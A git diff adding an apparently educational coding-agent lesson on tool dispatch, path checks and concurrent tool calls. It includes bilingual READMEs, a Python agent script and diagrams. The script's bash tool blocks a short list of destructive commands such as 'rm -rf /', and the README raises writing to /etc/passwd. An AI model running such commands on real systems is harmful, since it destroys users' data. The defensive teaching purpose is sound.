+ + diff --git a/s02_tool_use/README.ja.md b/s02_tool_use/README.ja.md new file mode 100644 index 000000000..0853cc811 --- /dev/null +++ b/s02_tool_use/README.ja.md @@ -0,0 +1,256 @@ +# s02: Tool Use — ツール一つ追加、一行追加だけ + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → `s02` → [s03](../s03_permission/) → s04 → ... → s19 +> *"ツールを一つ追加、ハンドラを一つ追加"* — ループはそのまま。新しいツールをディスパッチマップに登録するだけ。 +> +> **Harness レイヤー**: ツールディスパッチ — モデルが触れる範囲を拡張。 + +--- + +## bash 一つだけのスイスアーミーナイフ + +s01 の Agent には bash 一つのツールしかない。ファイルを読むには `cat`、書くには `echo "..." > file.py`、編集するには `sed`。 + +これではモデルにとって苦痛だ — 「このファイルを読みたい」と考えていても、`cat path/to/file` に翻訳しなければならない。翻訳そのものがトークンを消費し、エラーも起きやすい。 + +**あなただって、スイスアーミーナイフ一本で全てを済ませないだろう。** + +--- + +## 鳥瞰図:ツールディスパッチ — ループ不変、マッピングを追加するだけ + +![Tool Dispatch](images/tool-dispatch.ja.svg) + +s01 のループは完全に保持される(LLM 呼び出し、stop_reason 判定、メッセージ追加 — 一文字も変更なし)。唯一の変更点はツール実行の 1 行:`run_bash()` が `TOOL_HANDLERS[block.name]()` の検索ディスパッチに置き換わる。 + +Agent にツールを追加するには、たった二つ: + +1. **ツールを定義**:`TOOLS` 配列に一条を追加 +2. **ハンドラを登録**:`TOOL_HANDLERS` 辞書に一つのマッピングを追加 + +ループ自体 — 一行も変更しない。 + +--- + +## 1 つのツールから 5 つのツールへ + +s01 には bash だけだった: + +```python +TOOLS = [{"name": "bash", ...}] + +def run_bash(command): ... 
+``` + +s02 では 5 つに増え、各ツールは独立して定義される: + +```python +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", ...}, + {"name": "read_file", "description": "Read file contents.", ...}, + {"name": "write_file", "description": "Write content to file.", ...}, + {"name": "edit_file", "description": "Replace text in file once.", ...}, + {"name": "glob", "description": "Find files by pattern.", ...}, +] +``` + +各ツールには専用の実装関数がある: + +```python +def run_read(path, limit=None): + lines = safe_path(path).read_text().splitlines() + if limit: + lines = lines[:limit] + return "\n".join(lines) + +def run_write(path, content): + safe_path(path).write_text(content) + return f"Wrote {len(content)} bytes to {path}" + +def run_edit(path, old_text, new_text): + text = safe_path(path).read_text() + if old_text not in text: + return "Error: text not found" + safe_path(path).write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + +def run_glob(pattern): + import glob as g + return "\n".join(g.glob(pattern, root_dir=WORKDIR)) +``` + +--- + +## ツールディスパッチ:ループ内は一行だけ変更 + +```python +TOOL_HANDLERS = { + "bash": run_bash, + "read_file": run_read, + "write_file": run_write, + "edit_file": run_edit, + "glob": run_glob, +} + +# ループ内で変更されたのは一行だけ — ハードコードの run_bash から検索ディスパッチへ: +for block in response.content: + if block.type == "tool_use": + handler = TOOL_HANDLERS[block.name] # 検索 + output = handler(**block.input) # 呼び出し + results.append(...) +``` + +ツールの追加 = `TOOLS` 配列に一条 + `TOOL_HANDLERS` 辞書に一行。ループは変わらない。 + +--- + +## モデルが複数のツールを同時に呼び出したら? 
+
+![並列比較](images/concurrency-comparison.ja.svg)
+
+モデルはよく一度に複数のツール呼び出しを返す — 「a.py と b.py を読んで、全 .py ファイルを列挙して」。
+
+この 3 つの操作(a を読む、b を読む、ファイル一覧)は互いに依存しないため、**並列実行**できる。しかし、モデルが同じファイルに先に書き込んでから読み取る場合、**順次実行**しなければならない — read は write の完了を待つ必要がある。
+
+教育版はパーティション方式を使う:
+
+```python
+def partition_tool_calls(blocks):
+    """二つのグループに分割:並列安全なものと順次実行必須のもの。"""
+    concurrent, sequential = [], []
+    for block in blocks:
+        if block.type != "tool_use":
+            continue
+        # read と glob は読み取り専用、並列可能
+        if block.name in ("read_file", "glob"):
+            concurrent.append(block)
+        else:
+            sequential.append(block)
+    return concurrent, sequential
+
+# 実行:先にファイル変更の可能性があるものを順次実行、次に読み取り専用を並列実行
+for block in sequential:
+    output = execute_tool(block)
+    results.append(...)
+for block in concurrent:
+    output = execute_tool(block)
+    results.append(...)
+```
+
+**重要な修正点**:教育版では当初 bash を sequential グループに入れていた(「ファイルシステムを変更する可能性がある」ため)。しかし bash の実際の動作はコマンド次第 — `ls -la` は読み取り専用で read と並列実行可能。`rm file.txt` こそ順次実行が必要。CC の `isConcurrencySafe()` はツール名ではなく具体的な入力で判断する。教育版はツール名でハードコードした簡略版を使い、コードはシンプルだがこの粒度を犠牲にしている。
+
+完璧な並列処理ではない(教育版にはスレッドプールがない)が、核心概念を伝えるには十分:**一部のツールは同時に実行でき、一部はできない**。
+
+---
+
+## 早見表
+
+| 概念 | 一言で |
+|------|--------|
+| TOOL_HANDLERS | ツール名 → ハンドラ関数の辞書。ツール追加 = マッピング一行追加 |
+| ツール定義 | モデルに「何ができるか」を伝える JSON schema |
+| パーティション | 並列安全なツールと順次実行必須のツールを分離 |
+| ループ不変 | s01 の `while True` ループ — 一行も変更なし |
+
+---
+
+## s01 からの変更
+
+| コンポーネント | 変更前 (s01) | 変更後 (s02) |
+|--------------|-------------|-------------|
+| ツール数 | 1 (bash) | 5 (+read, write, edit, glob) |
+| ツール実行 | ハードコード `run_bash()` | TOOL_HANDLERS 検索ディスパッチ |
+| 並列処理 | なし | partition_tool_calls |
+| パス安全性 | なし | safe_path 検証 |
+| ループ | `while True` + `stop_reason` | s01 と完全に同一 |
+
+---
+
+## 試してみよう
+
+```sh
+cd learn-claude-code
+python s02_tool_use/code.py
+```
+
+以下のプロンプトを試してみよう:
+
+1. `Read the file README.md and tell me what this project is about`
+2. `Create a file called test.py that prints "hello", then read it back`
+3. 
`Find all Python files in this directory` +4. `Read both README.md and requirements.txt, then create a summary file` + +観察のポイント:モデルがツールを一つだけ呼び出すときと、複数同時に呼び出すときの違い。複数ツールは順次実行か並列実行か? + +--- + +## 次へ + +Agent は 5 つのツールを持ち、何でもできる。しかし `rm -rf /` を実行できるか? `/etc/passwd` に書き込めるか? + +→ s03 Permission:ツール実行前にゲートを追加 — この操作は安全か? ユーザーの承認が必要か? + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `Tool.ts`、`toolOrchestration.ts`、`toolExecution.ts`、`StreamingToolExecutor.ts` の完全分析に基づく。 + +### 一、ツール定義方式 + +**教育版**:`TOOLS` 配列 + `TOOL_HANDLERS` 辞書。定義と実装が分離。 +**CC**:各ツールは `buildTool()` で作成された独立オブジェクトで、schema、バリデーション、権限、実行を含む。`getAllBaseTools()` が全ツールを集約。 + +教育版の分離方式は教学に適している — 読者は「ツール追加 = 二つの定義」と一目で分かる。 + +### 二、並列安全性:isConcurrencySafe() vs isReadOnly() + +教育版の最大の簡略化。CC は `isReadOnly()` ではなく `isConcurrencySafe(input)` で並列可否を判断する: + +| | isReadOnly | isConcurrencySafe | +|---|---|---| +| FileRead | true | true | +| Glob | true | true | +| Bash `ls` | true | **true** ← 重要な違い | +| Bash `rm` | false | false | +| TaskCreate | false | **true** ← 状態変更するが並列可能(s12 で紹介) | + +CC の Bash ツールの `isConcurrencySafe` は `isReadOnly` と同じ — 読み取り専用コマンドは並列可能、書き込みコマンドは不可。TaskCreate はタスクファイルを変更するが、毎回異なるファイルに書き込むため並列可能。教育版はツール名でハードコードしたグループ分けを行い、Bash の入力依存性を失うが核心概念は保持している。 + +### 三、パーティションアルゴリズム + +CC の `partitionToolCalls()`(`toolOrchestration.ts:91`)は二つのグループに分けるのではなく、ツール呼び出しを**連続ブロックごとにバッチ化**する: + +``` +[read A, read B, glob *.py, bash "rm x", read C] + → batch1(並列): [read A, read B, glob *.py] + → batch2(直列): [bash "rm x"] + → batch3(並列): [read C] +``` + +連続する並列安全な呼び出しを同じバッチにまとめて並列実行。非並列安全な呼び出しに遭遇すると新しいバッチを開始して直列実行。バッチ間は厳密に順次。 + +### 四、バリデーションパイプライン + +CC の各ツール呼び出しは厳格な 5 段階のバリデーションを経る(`toolExecution.ts:599`): + +1. **Zod schema バリデーション**(教育版は JSON Schema で代替):パラメータの型/構造チェック +2. **ツールレベル validateInput()**:パラメータ値の検証(例:パスが作業ディレクトリ内か) +3. **PreToolUse フック**(s04 で詳解):フックはメッセージの返却、入力の変更、実行のブロックが可能 +4. **権限チェック**(s03 の核心):canUseTool + checkPermissions → allow/deny/ask +5. 
**tool.call() の実行** + +教育版は Zod を省略(JSON Schema を使用)、validateInput を省略(安全関数を使用)、権限チェックとフック概念は保持。 + +### 五、ストリーミングツール実行 + +CC の `StreamingToolExecutor`(`StreamingToolExecutor.ts`)はモデルがまだ生成中にツールを起動する — モデルの完了を待たない。`read_file` はモデルが「分析します」と出力中に完了するかもしれない。教育版はこれを実装しない。s01 と同じ目標 — 概念の明確さ、極限のパフォーマンスではない。 + +### 六、ツール結果の永続化 + +各ツールには `maxResultSizeChars` フィールドがある。この閾値を超える結果はディスクに保存され、モデルにはプレビュー + ファイルパスが表示される。FileRead は特殊 — `Infinity` に設定され、ファイル読み出し結果の再永続化を防ぐ。具体的には、FileRead の結果が閾値を超えて永続化されると、モデルがその永続化ファイルを次に読むときにまた永続化がトリガーされ → 無限ループ(ファイル読む → 永続化 → 再読み → 再永続化 → ...)になる。 + +
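第六項の「閾値超過の結果をディスクへ退避し、プレビュー+パスを返す」という動きは、数行で形にできる(閾値・フォーマットはいずれも仮定の最小スケッチで、CC の実装とは異なりうる):

```python
import os
import tempfile

def persist_large_result(result: str, max_chars: int = 4000) -> str:
    """閾値内ならそのまま返し、超過分は一時ファイルへ退避して
    プレビュー + パスを返す(maxResultSizeChars の教育的スケッチ)。"""
    if len(result) <= max_chars:
        return result
    fd, path = tempfile.mkstemp(suffix=".txt", prefix="tool_result_")
    with os.fdopen(fd, "w") as f:
        f.write(result)
    preview = result[:200]
    return f"{preview}\n... ({len(result)} chars total; full output: {path})"
```
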
+ + diff --git a/s02_tool_use/README.md b/s02_tool_use/README.md new file mode 100644 index 000000000..9ec667850 --- /dev/null +++ b/s02_tool_use/README.md @@ -0,0 +1,256 @@ +# s02: Tool Use — 多加一个工具,只加一行 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → `s02` → [s03](../s03_permission/) → s04 → ... → s19 +> *"加一个工具, 只加一个 handler"* — 循环不用动, 新工具注册进 dispatch map 就行。 +> +> **Harness 层**: 工具分发 — 扩展模型能触达的边界。 + +--- + +## 只有 bash 一把瑞士军刀 + +s01 的 Agent 只有一个 bash 工具。读文件要 `cat`,写文件要 `echo "..." > file.py`,改文件要 `sed`。 + +这让模型很痛苦——它脑子里想的是"读这个文件",手上却要翻译成 `cat path/to/file`。翻译过程本身消耗 token,而且容易出错。 + +**你也不会只用一把瑞士军刀干所有活。** + +--- + +## 鸟瞰:工具分发——循环不变,只加映射 + +![Tool Dispatch](images/tool-dispatch.svg) + +s01 的循环完全保留(LLM 调用、stop_reason 判断、消息追加——一字不改)。唯一的变动在工具执行那 1 行:`run_bash()` 替换为 `TOOL_HANDLERS[block.name]()` 查表分发。 + +给 Agent 加一个工具只需要做两件事: + +1. **定义工具**:在 `TOOLS` 数组里加一条描述 +2. **注册处理函数**:在 `TOOL_HANDLERS` 字典里加一个映射 + +循环本身一行都不改。 + +--- + +## 从 1 个工具到 5 个工具 + +s01 只有一个 bash: + +```python +TOOLS = [{"name": "bash", ...}] + +def run_bash(command): ... 
+``` + +s02 加到 5 个,每个工具都是独立定义: + +```python +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", ...}, + {"name": "read_file", "description": "Read file contents.", ...}, + {"name": "write_file", "description": "Write content to file.", ...}, + {"name": "edit_file", "description": "Replace text in file once.", ...}, + {"name": "glob", "description": "Find files by pattern.", ...}, +] +``` + +每个工具有自己的实现函数: + +```python +def run_read(path, limit=None): + lines = safe_path(path).read_text().splitlines() + if limit: + lines = lines[:limit] + return "\n".join(lines) + +def run_write(path, content): + safe_path(path).write_text(content) + return f"Wrote {len(content)} bytes to {path}" + +def run_edit(path, old_text, new_text): + text = safe_path(path).read_text() + if old_text not in text: + return "Error: text not found" + safe_path(path).write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + +def run_glob(pattern): + import glob as g + return "\n".join(g.glob(pattern, root_dir=WORKDIR)) +``` + +--- + +## 工具分发:一行不改循环 + +```python +TOOL_HANDLERS = { + "bash": run_bash, + "read_file": run_read, + "write_file": run_write, + "edit_file": run_edit, + "glob": run_glob, +} + +# 循环里只改了一行——从硬编码 run_bash 变成查表: +for block in response.content: + if block.type == "tool_use": + handler = TOOL_HANDLERS[block.name] # 查表 + output = handler(**block.input) # 调用 + results.append(...) +``` + +加一个工具 = 在 `TOOLS` 数组加一条 + 在 `TOOL_HANDLERS` 字典加一行。循环不变。 + +--- + +## 模型一次调了多个工具怎么办? 
+ +![并发对比](images/concurrency-comparison.svg) + +模型经常一次返回多个工具调用——"读一下 a.py 和 b.py,然后列出所有 .py 文件"。 + +这三个操作(读 a、读 b、列文件)互不依赖,可以**并行执行**。但如果模型先 write 再 read 同一个文件,就必须**顺序执行**——read 必须等 write 完成。 + +教学版用分区逻辑: + +```python +def partition_tool_calls(blocks): + """分成两组:可以并发的,和必须顺序执行的。""" + concurrent, sequential = [], [] + for block in blocks: + if block.type != "tool_use": + continue + # read 和 glob 是只读的,可以并发 + if block.name in ("read_file", "glob"): + concurrent.append(block) + else: + sequential.append(block) + return concurrent, sequential + +# 执行:先顺序跑可能改文件系统的,再并发跑只读的 +for block in sequential: + output = execute_tool(block) + results.append(...) +for block in concurrent: + output = execute_tool(block) + results.append(...) +``` + +**关键修正**:教学版最初把 bash 放在 sequential 组(因为它"可能改文件系统")。但 bash 的实际行为取决于具体命令——`ls -la` 是只读的,完全可以和 read 并发跑;`rm file.txt` 才需要排队。CC 的 `isConcurrencySafe()` 是按具体输入判断的,不是按工具名。教学版用了简化版的分区(按工具名硬编码),代码更简单但丢了这个粒度。 + +这不是完美的并发(教学版没有线程池),但传达了核心概念:**某些工具可以同时跑,某些不行**。 + +--- + +## 速查 + +| 概念 | 一句话 | +|------|--------| +| TOOL_HANDLERS | 工具名 → 处理函数的字典。加工具 = 加一行映射 | +| 工具定义 | 告诉模型"我能做什么"的 JSON schema | +| 分区 | 把并发安全的工具和必须顺序执行的分开 | +| 循环不变 | s01 的 `while True` 循环一行都没改 | + +--- + +## 相对 s01 的变更 + +| 组件 | 之前 (s01) | 之后 (s02) | +|------|-----------|-----------| +| 工具数量 | 1 (bash) | 5 (+read, write, edit, glob) | +| 工具执行 | 硬编码 `run_bash()` | TOOL_HANDLERS 查表分发 | +| 并发 | 无 | partition_tool_calls 分区 | +| 路径安全 | 无 | safe_path 校验 | +| 循环 | `while True` + `stop_reason` | 与 s01 完全一致 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s02_tool_use/code.py +``` + +试试这些 prompt: + +1. `Read the file README.md and tell me what this project is about` +2. `Create a file called test.py that prints "hello", then read it back` +3. `Find all Python files in this directory` +4. `Read both README.md and requirements.txt, then create a summary file` + +观察重点:模型什么时候只调一个工具,什么时候一次调多个?多个工具是顺序执行还是并行? + +--- + +## 接下来 + +现在 Agent 手里有 5 个工具,什么都能做。但它能不能 `rm -rf /`?能不能往 `/etc/passwd` 写东西? 
+ +s03 Permission → 在工具执行之前加一道门:这个操作安全吗?需要用户批准吗? + +
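正文提到教学版的 concurrent 组没有线程池,其实还是逐个执行的。如果想让它真正并行,可以用标准库的 `ThreadPoolExecutor`。下面是一个独立的最小示意,`execute_tool` 和 `calls` 都是演示用的假设,不是本项目代码:

```python
# 最小示意:用线程池并行执行"并发安全"的工具调用。
# execute_tool 和 calls 都是演示用的假设,不代表本项目或 CC 的真实接口。
import time
from concurrent.futures import ThreadPoolExecutor

def execute_tool(call: dict) -> str:
    time.sleep(0.05)  # 模拟 I/O 等待(读文件、glob 扫描)
    return f"done: {call['name']}"

calls = [{"name": "read_file"}, {"name": "glob"}, {"name": "read_file"}]

start = time.monotonic()
with ThreadPoolExecutor(max_workers=4) as pool:
    # pool.map 保证结果顺序与提交顺序一致,tool_result 不会乱序
    results = list(pool.map(execute_tool, calls))
elapsed = time.monotonic() - start
# 三个 0.05s 的调用并行执行,总耗时接近单次调用而不是三倍
```

注意要在所有调用完成后再把 `tool_result` 追加进 messages——API 要求每个 `tool_use` 都有对应的结果。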
+深入 CC 源码 + +> 以下基于 CC 源码 `Tool.ts`、`toolOrchestration.ts`、`toolExecution.ts`、`StreamingToolExecutor.ts` 的完整分析。 + +### 一、工具定义方式 + +**教学版**:`TOOLS` 数组 + `TOOL_HANDLERS` 字典。定义和实现分开。 +**CC**:每个工具是 `buildTool()` 创建的独立对象,包含 schema、验证、权限、执行。`getAllBaseTools()` 汇总所有工具。 + +教学版的分离方式对教学更清晰——读者一眼看到"加一个工具 = 两条定义"。 + +### 二、并发安全判断:isConcurrencySafe() vs isReadOnly() + +这是教学版最大的简化。CC 用 `isConcurrencySafe(input)` 而不是 `isReadOnly()` 来判断能否并发: + +| | isReadOnly | isConcurrencySafe | +|---|---|---| +| FileRead | true | true | +| Glob | true | true | +| Bash `ls` | true | **true** ← 关键差异 | +| Bash `rm` | false | false | +| TaskCreate | false | **true** ← 改状态但可并发(TaskCreate 在 s12 介绍) | + +CC 的 Bash tool 的 `isConcurrencySafe` 等于 `isReadOnly`——只读命令可并发,写命令不可。TaskCreate 虽然改了任务文件,但每次都写不同的文件,所以可以并发。教学版用工具名硬编码分组,丢了 Bash 的输入相关性,但保留了核心概念。 + +### 三、分区算法 + +CC 的 `partitionToolCalls()`(`toolOrchestration.ts:91`)不是分两组,而是把工具调用**按连续块分批**: + +``` +[read A, read B, glob *.py, bash "rm x", read C] + → batch1(并发): [read A, read B, glob *.py] + → batch2(串行): [bash "rm x"] + → batch3(并发): [read C] +``` + +并发安全的连续块编入同一个 batch 并发执行,遇到非并发安全的就开新 batch 串行执行。batch 之间严格顺序。 + +### 四、验证管线 + +CC 的每个工具调用经过严格的 5 步验证(`toolExecution.ts:599`): + +1. **Zod schema 验证**(教学版用 JSON Schema 替代):参数类型/结构检查 +2. **工具级 validateInput()**:参数值验证(如路径是否在工作区内) +3. **PreToolUse hooks**(s04 详细介绍):钩子可以返回消息、修改输入、阻止执行 +4. **权限检查**(s03 的核心内容):canUseTool + checkPermissions → allow/deny/ask +5. **执行 tool.call()** + +教学版省略了 Zod(用 JSON Schema)、省略了 validateInput(用安全函数)、保留了权限检查和钩子概念。 + +### 五、流式工具执行 + +CC 的 `StreamingToolExecutor`(`StreamingToolExecutor.ts`)让工具在模型还在生成时就启动——不等模型说完。`read_file` 可能在模型还在输出"我来分析"的时候就跑完了。教学版不实现这个,目标和 s01 一致——概念清晰,不追求性能极致。 + +### 六、工具结果持久化 + +每个工具有一个 `maxResultSizeChars` 字段。结果超过这个值就落盘,模型看到的是预览 + 文件路径。FileRead 特殊——设为 `Infinity`,防止读文件的输出又被当成文件落盘。具体来说,如果 FileRead 的结果超过阈值被落盘,模型下次读那个落盘文件时又会触发落盘 → 无限循环(读文件 → 落盘 → 再读 → 再落盘 → ...)。 + +
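上面"三、分区算法"描述的按连续块分批,可以用几行 Python 近似。这里的 `is_safe` 用工具名近似 `isConcurrencySafe(input)`,仅作演示,不是 CC 的真实代码:

```python
# 演示用:把工具调用按"连续的并发安全块"分批,近似 CC 的 partitionToolCalls()。
# 连续的安全调用并入同一批;遇到非安全调用就让它独占一批;批与批之间顺序执行。
def partition_into_batches(calls: list[dict]) -> list[dict]:
    def is_safe(call: dict) -> bool:
        return call["name"] in ("read_file", "glob")  # 按工具名近似,真实 CC 看输入

    batches: list[dict] = []
    for call in calls:
        safe = is_safe(call)
        if batches and safe and batches[-1]["concurrent"]:
            batches[-1]["calls"].append(call)  # 延续当前并发批
        else:
            batches.append({"concurrent": safe, "calls": [call]})  # 开新批
    return batches
```

用正文的例子验证:`[read A, read B, glob, bash "rm x", read C]` 会被分成 3 批——前三个并发、`bash` 独占一批、最后的 read 再开一批。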
+ + diff --git a/s02_tool_use/code.py b/s02_tool_use/code.py new file mode 100644 index 000000000..e843a4776 --- /dev/null +++ b/s02_tool_use/code.py @@ -0,0 +1,212 @@ +#!/usr/bin/env python3 +""" +s02: Tool Use — 在 s01 基础上新增 4 个工具 + 分发映射 + 并发分区。 + +运行: python s02_tool_use/code.py +需要: pip install anthropic python-dotenv + .env 中配置 ANTHROPIC_API_KEY + +本文件 = s01 的全部代码 + 以下新增: + + run_read / run_write / run_edit / run_glob 四个工具实现 + + TOOL_HANDLERS 分发映射(替代 s01 中硬编码的 run_bash 调用) + + partition_tool_calls 并发分区 + + safe_path 路径安全校验 + +循环本身(agent_loop)与 s01 完全一致。 +""" + +import os, subprocess +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') + readline.parse_and_bind('set input-meta on') + readline.parse_and_bind('set output-meta on') + readline.parse_and_bind('set convert-meta off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. Use tools to solve tasks. Act, don't explain." 
+ + +# ═══════════════════════════════════════════════════════════ +# FROM s01 (unchanged) +# ═══════════════════════════════════════════════════════════ + +def run_bash(command: str) -> str: + dangerous = ["rm -rf /", "sudo", "shutdown", "reboot", "> /dev/"] + if any(d in command for d in dangerous): + return "Error: Dangerous command blocked" + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + except (FileNotFoundError, OSError) as e: + return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s02: 4 个新工具 +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... 
({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s02: 工具定义(s01 只有一个 bash,现在扩展到 5 个) +# ═══════════════════════════════════════════════════════════ + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", 
"description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] + +# ═══════════════════════════════════════════════════════════ +# NEW in s02: 工具分发映射(s01 是硬编码 run_bash,现在改为查表) +# ═══════════════════════════════════════════════════════════ + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, +} + + +# ═══════════════════════════════════════════════════════════ +# NEW in s02: 并发分区(s01 只有 bash 单个工具,不需要分区) +# ═══════════════════════════════════════════════════════════ + +def partition_tool_calls(blocks): + concurrent, sequential = [], [] + for block in blocks: + if block.type != "tool_use": + continue + if block.name in ("bash", "edit_file", "write_file"): + sequential.append(block) + else: + concurrent.append(block) + return concurrent, sequential + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — 与 s01 结构完全一致,只改了工具执行那一行 +# s01: output = run_bash(block.input["command"]) +# s02: output = TOOL_HANDLERS[block.name](**block.input) +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + # s02 改动: 分区执行(s01 是直接循环执行) + concurrent, sequential = partition_tool_calls(response.content) + results = [] + + for block in sequential: + print(f"\033[33m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) # s02: 查表替代硬编码 + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + + for block in concurrent: + print(f"\033[36m> 
{block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s02: Tool Use — 在 s01 基础上加了 4 个工具") + print("输入问题,回车发送。输入 q 退出。\n") + + history = [] + while True: + try: + query = input("\033[36ms02 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s02_tool_use/images/concurrency-comparison.en.svg b/s02_tool_use/images/concurrency-comparison.en.svg new file mode 100644 index 000000000..72b7890fa --- /dev/null +++ b/s02_tool_use/images/concurrency-comparison.en.svg @@ -0,0 +1,109 @@ + + + + + + + + + + + + + + + + + + + + Tool Concurrency — Teaching Version vs Claude Code + + + + Model returns 5 tool calls at once + + + read A.py + + + glob *.py + + + bash "ls -la" + + + write B.py + + + read C.py + + + + + + + Teaching: Hardcoded by Tool Name + + + if name in ("bash","write","edit") → sequential + + + else → concurrent + + Result: 2 groups + + + Sequential (runs first) + bash "ls" · write B + + + Concurrent + read A · glob · read C + + ⚠ bash "ls" placed in sequential group + It's read-only — could run concurrently with reads + + + + Claude Code: isConcurrencySafe(input) + + + Each tool call judged individually: + tool.isConcurrencySafe(parsedInput) → bool + + Result: 3 batches (by consecutive blocks) + + + Batch 1 + Concurrent + read A · glob + + + + + Batch 2 + Concurrent + bash "ls" + + + + + Batch 3 + Serial + write B + + + Batch 4 + read C · Concurrent + + ✓ bash "ls" correctly runs concurrently — faster than 
teaching version + ✓ Input-dependent judgment, not hardcoded by tool name + + + + Key Difference + • Teaching: Groups by tool name → simple but coarse; bash read-only commands (ls, cat) incorrectly serialized + • CC: Judges by isConcurrencySafe(input) per call → bash "ls" and read_file can run concurrently; bash "rm" must queue + • Teaching simplification is intentional — first understand "some tools can run simultaneously", then naturally ask "can bash ls run with read?" + diff --git a/s02_tool_use/images/concurrency-comparison.ja.svg b/s02_tool_use/images/concurrency-comparison.ja.svg new file mode 100644 index 000000000..4824590c8 --- /dev/null +++ b/s02_tool_use/images/concurrency-comparison.ja.svg @@ -0,0 +1,109 @@ + + + + + + + + + + + + + + + + + + + + ツール並列実行 — 教育版 vs Claude Code + + + + モデルが一度に 5 つのツール呼び出しを返す + + + read A.py + + + glob *.py + + + bash "ls -la" + + + write B.py + + + read C.py + + + + + + + 教育版:ツール名でハードコード分组 + + + if name in ("bash","write","edit") → sequential + + + else → concurrent + + 結果:2 グループ + + + Sequential(先に実行) + bash "ls" · write B + + + Concurrent(並列) + read A · glob · read C + + ⚠ bash "ls" が sequential グループに配置 + 読み取り専用なので read と並列実行可能なのに + + + + Claude Code:isConcurrencySafe(input) + + + 各ツール呼び出しを個別に判定: + tool.isConcurrencySafe(parsedInput) → bool + + 結果:3 バッチ(連続ブロックごと) + + + Batch 1 + 並列 + read A · glob + + + + + Batch 2 + 並列 + bash "ls" + + + + + Batch 3 + 直列 + write B + + + Batch 4 + read C · 並列 + + ✓ bash "ls" が正しく並列実行 — 教育版より高速 + ✓ 入力に基づく判定、ツール名のハードコードではない + + + + 核心的な違い + • 教育版:ツール名で分组 → シンプルだが粗い、bash の読み取り専用コマンド(ls、cat)が誤って直列化される + • CC:isConcurrencySafe(input) で呼び出しごとに判定 → bash "ls" と read_file は並列可能、bash "rm" は順次必須 + • 教育版の簡略化は意図的 — まず「一部のツールは同時に実行できる」を理解し、自然に「bash ls は read と一緒に?」と問いが出る + diff --git a/s02_tool_use/images/concurrency-comparison.svg b/s02_tool_use/images/concurrency-comparison.svg new file mode 100644 index 000000000..8408f2dc1 --- /dev/null +++ b/s02_tool_use/images/concurrency-comparison.svg @@ -0,0 
